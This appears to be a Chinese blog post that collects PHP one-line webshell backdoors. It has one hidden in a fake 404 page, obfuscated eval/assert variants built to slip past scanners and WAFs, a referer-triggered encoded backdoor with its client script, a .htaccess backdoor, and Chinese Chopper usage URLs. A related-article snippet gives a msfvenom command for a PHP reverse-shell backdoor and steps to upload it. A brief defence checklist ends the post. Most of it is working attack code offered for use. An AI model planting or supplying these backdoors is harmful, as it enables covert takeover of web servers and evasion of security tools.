PHP一句话后门

最新推荐文章于 2021-05-21 22:08:03 发布
最新推荐文章于 2021-05-21 22:08:03 发布
阅读量3k 收藏 2
点赞数
分类专栏: PHP服务

1、利用404页面隐藏一句话

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

2、无特征隐藏一句话 

<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

/*
将$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码的话,是不会报警的,达到目的了。
*/

3、高级隐藏一句话 

$_GET[a]($_GET[b]);

利用方法:
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%    29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
/*
执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马,真可谓不可小视,简简单单的一句话,被延伸到这般应用。
*/
4、层级请求,编码运行一句话 

/*此方法用两个文件实现
文件1
*/
<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
   eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
文件2

<?php
//2.php
header('Content-type:text/html;charset=utf-8');
//要执行的代码
$code = <<<CODE
phpinfo();
CODE;
//进行base64编码
$code = base64_encode($code);
//构造referer字符串
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);
/*
通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf对referer这些检测要松一点,或者没有检测。用这个思路bypass waf不错。
*/

5、三个变形的一句话木马 

第一个

<?php ($_=@$_GET[2]).@$_($_POST[1])?>
在菜刀里写http://site/1.php?2=assert密码是1

第二个

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。

如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。

第三个

($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
str_rot13(‘riny’)即编码后的eval,完全避开了关键字,又不失效果,让人吐血!

6、.htaccess做木马后门 

AddType application/x-httpd-php .htaccess
###### SHELL ###### 这里写上你的后门吧###### LLEHS ######

7、特殊php一句话 

1、
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
2、
$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行
3、
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
//重命名任何文件
4、
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
//菜刀一句话
5、include ($uid);
//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif
//gif插一句话
6、典型一句话
程序后门代码
<?php eval_r($_POST[sb])?>
程序代码
<?php @eval_r($_POST[sb])?>
//容错代码
程序代码
<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST['sa']($_POST['sb']);?>
程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
<O>h=@eval_r($_POST1);</O>
程序代码
<script language="php">@eval_r($_POST[sb])</script>
//绕过<?限制的一句话

最后,如何应对php后门 

1、对PHP程序编写要有安全意识
2、服务器日志文件要经常看,经常备份
3、对每个站点进行严格的权限分配
4、对动态文件及目录经常批量安全审查
5、学会如何进行手工杀毒《即行为判断查杀》
6、时刻关注,或渗入活跃的网络安全营地
7、对服务器环境层级化处理,哪怕一个函数也可做规则

zhiy_wis
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP入门
qq_40972280的博客
05-03 116
 PHP(外文名:PHP: Hypertext Preprocessor,中文名:“超文本预处理器”)是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,利于学习,使用广泛,主要适用于Web开发领域。PHP 独特的语法混合了C、Java、Perl以及PHP自创的语法。它可以比CGI或者Perl更快速地执行动态网页。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HT...
PHP入门(一)
ly_yanbo的博客
08-19 197
前言 最近和做后端的朋友聊天,发现我们已经出现隔阂了,为了能和他们在同一个频道,所以决定也学门后端语言。PHP语言和我们前端JavaScript语言比较相似,被称为最方便的语言,官方定义好的函数有4000多种。学好一门后端语言,同时也能让我们更好的了解前后端的交接点在哪,以及一些简单的后端操作。 一、变量 1.PHP中不能声明变量,变量在第一次赋值时创建。 2.变量以为$开头。 3.命名规则同js...
php超强后门在任意位置创建文件,web后门 那些强悍猥琐流的PHP一句话后门大全分享...
weixin_36094492的博客
03-09 464
强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马:复制代码代码如下:404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replac...
php隐藏一句话,利用php.ini隐藏一句话
weixin_33132251的博客
03-17 149
利用php中的一个自动在文件中增加页眉和页脚的功能,隐藏一句话。在站点的某一目录(如:根目录)下编辑文件php脚本文件,名称为:info.php,内容如下Phpinfo();?>在本地打开如:http://127.0.0.1/info.php检查系统使用的配置文件找到并编辑该配置文件如下行:auto_prepend_file =test.php #自动将“test.php”中的内容增加到任...
php一句话后门,PHP一句话后门集锦
weixin_42436686的博客
03-10 681
404页面的利用:404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>404页面是网站常用的文件,一般建议好后很少有人会去对它进...
.user.ini文件构成的PHP后门(转)
weixin_30906425的博客
12-29 328
phith0n · 2014/10/30 10:51 0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是 nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的...
那些强悍的PHP一句话后门
大方子
08-06 9423
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马   PHP   1 2 3 4 ...
php一句话后门学习(含免杀)
qq_50854662的博客
05-21 1116
php一句话后门 开发很久的可利用函数 eval和assert php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。 <?php @eval($_POST['a']) ?> 但由于eval不能拆分,早期也有人喜欢用assert,这样通过编码和拆分assert,隐蔽性更高 <?php @assert($_POST['a']) ?> 虽然有人说assert在php7.0及其以上版本被禁用,但实际上并没有禁用,而是和eval一样禁止拆分了。 绝大部分一
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
这是一个典型的PHP一句话后门,它通过`eval`函数执行POST请求中的`c`参数所携带的任意PHP代码。当用户提交带有恶意代码的POST请求时,这个后门就会执行这些代码,从而可能导致服务器被黑客控制。 接下来,代码展示...
php实现批量查询清除一句话后门的代码
10-30
一句话后门一般简单,容易隐藏危害大,查找麻烦等。今天发现了这个Xall.php专门批量查询干掉一句话后门的代码,大家可以省去不少麻烦了
lanker 一句话php后门客户端
06-04
lanker一句话php后门客户端
lanker一句话PHP后门客户端3[1][1].0内部版
06-14
lanker一句话PHP后门客户端3[1][1].0内部版
PHP一句话木马后门
chuangqudiao9845的博客
03-23 2479
在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器。 一句话木马的原理很简单,造型也很简单,所以造成了它理解起来容易,抵御起来也容易。于是黑白的较量变成了黑帽不断的构造变形的后门,去...
从建站到拿站 -- PHP判断循环及函数
weixin_41489908的博客
06-06 187
一个人自愈能力越强,才有可能接近幸福,做一个沉默寡言,心却有一片海的人,成熟的稻谷都是低头的,各自努力。。。 ---- 网易云热评 一、判断语句 if..else.. <?php $a=10; if($a>10) { echo "a>10"; } elseif($a=10) { echo "a=10"; } else { echo "a<10"; } ?> switch <?php $a=12; switch (...
小识.htaccess文件
aijie6150的博客
10-18 310
.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过ht...
数据分析的核心技能和方法
最新发布
07-19
数据分析的核心技能和方法
如何使用 msfvenom创造一个php后门
04-07
以下是使用msfvenom创建php后门的步骤: 1. 打开终端并输入以下命令: ``` msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port Number> -f raw > backdoor.php ``` 2. 替换`<Your IP Address>`和`<Your Port Number>`为你的IP地址和端口号。 3. 运行命令后,将创建一个名为`backdoor.php`的文件,其中包含Meterpreter反向TCP Shell的payload。 4. 上传`backdoor.php`到目标服务器。 5. 打开Meterpreter会话,输入以下命令: ``` php backdoor.php ``` 6. 这将启动反向Shell并连接到你的机器上。现在你可以在目标服务器上执行命令以控制它。 请注意,这种方法仅适用于具有PHP解释器的目标服务器。如果目标服务器上没有PHP,则无法使用此方法创建后门

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值